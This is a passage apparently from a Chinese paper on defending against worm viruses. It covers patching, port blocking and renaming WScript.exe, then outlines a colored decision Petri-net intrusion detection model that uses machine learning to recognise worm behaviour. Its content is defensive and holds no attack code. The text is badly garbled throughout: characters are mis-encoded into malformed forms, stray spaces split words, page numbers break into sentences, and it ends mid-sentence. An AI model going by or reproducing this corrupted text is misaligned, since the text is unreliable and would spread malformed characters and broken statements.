37、雜度;通過網(wǎng)絡(luò)上的其他主機(jī)定期掃描開放共享和對(duì)登錄口令進(jìn)行破解嘗試，發(fā)現(xiàn)問題及時(shí)整改。(3 )針對(duì)通過系統(tǒng)漏洞傳播的病毒：配置Window s Upda t e自動(dòng)升級(jí)功能，使主 機(jī)能夠及時(shí)安裝系統(tǒng)補(bǔ)丁 ，防患于未然；定期通過漏洞掃描產(chǎn)品查找主機(jī)存在的 漏洞,發(fā)現(xiàn)漏洞，及時(shí)升級(jí)；關(guān)注系統(tǒng)提供商、安全廠商的安全警告，如有問題，則采取相應(yīng)措施。(4 )重命名或刪除命令解釋器：如W i n dow s系統(tǒng)下的W Sc ri P t.exe;通過防火 墻禁止除服務(wù)端口外的其他端口 ，切斷蠕蟲的傳播通道和通信通道。4. 2基于攻擊行為的著色判決 NP機(jī)入侵檢測系統(tǒng)模型基于攻擊行為的著色判決NP機(jī)入侵檢測

38、系統(tǒng)模型是成都信息安全與國家計(jì) 算網(wǎng)格實(shí)驗(yàn)室劉培順博士提出的，該模型利用P etr i網(wǎng)理論結(jié)合人工智能技術(shù)建 立了適合攻擊行為分析與檢測的理論和方法6 0Petri網(wǎng)是由C ar l A sam Petr i博士在1 962年提出的，它是一種網(wǎng)狀信 息流模型，包括條件和事件兩類結(jié)點(diǎn)，在這兩類結(jié)點(diǎn)的有向二分圖的基礎(chǔ)上添加 表示狀態(tài)信息的托肯(token)分布,并按引發(fā)規(guī)則使得事件驅(qū)動(dòng)狀態(tài)演變,從而 反應(yīng)系統(tǒng)動(dòng)態(tài)運(yùn)行過程。Petri網(wǎng)是對(duì)異步并發(fā)系統(tǒng)進(jìn)行建模與分析的有力工具。 所謂判決N P機(jī)就是具有輸入設(shè)輸出集且行為表達(dá)式是一個(gè)定序并發(fā)表達(dá)式的 確定PN機(jī)。著色PN機(jī)就是為位置和變遷加上稱為顏

39、色的標(biāo)識(shí)，這些標(biāo)識(shí)帶有數(shù)據(jù)值，從而可以相互區(qū)分不同的事件基于攻擊行為的著色判決P N機(jī)入侵檢測系統(tǒng)通過著色判決PN機(jī)對(duì)攻擊 行為進(jìn)行分析和建模，系統(tǒng)首先根據(jù)攻擊實(shí)例表示成并發(fā)表達(dá)式，再轉(zhuǎn)化為判決 PN機(jī)模型,然后使用機(jī)器學(xué)習(xí)的方法，通過對(duì)模型進(jìn)行歸納學(xué)習(xí)得到攻擊行為 的概念空間，使得系統(tǒng)能夠在某種程度上（基于同一弱點(diǎn)或相似行為的攻擊）對(duì)付未知攻擊模式，從而實(shí)現(xiàn)攻擊知識(shí)庫的更新和擴(kuò)展。利用著色判決PN機(jī)的有色合成操作，可以對(duì)多個(gè)模型合一，從而解決多模式匹配問題，使得系統(tǒng)能夠在模型增加的同時(shí)保持檢測的高效率。蠕蟲病毒與黑客入侵具有相似性，基于攻擊行為的著色判決PN機(jī)入侵檢測 系統(tǒng)完全可以檢測蠕蟲病毒。瓊斯病毒雖然能夠產(chǎn)生行為特征各異的子病毒，但這類子病毒既然是蠕蟲病毒就會(huì)具有蠕蟲病毒的共性 ，諸如自身復(fù)制、為了能夠 自啟動(dòng)而修改注冊表、打開端口連接其他計(jì)算機(jī)等，這些特征從理論上來講都會(huì) 被基于攻擊行為的著色判決PN機(jī)入侵檢測系統(tǒng)通過機(jī)器的自學(xué)習(xí)轉(zhuǎn)化P N機(jī)攻 擊模型、通過攻擊模型的泛化、合一而將該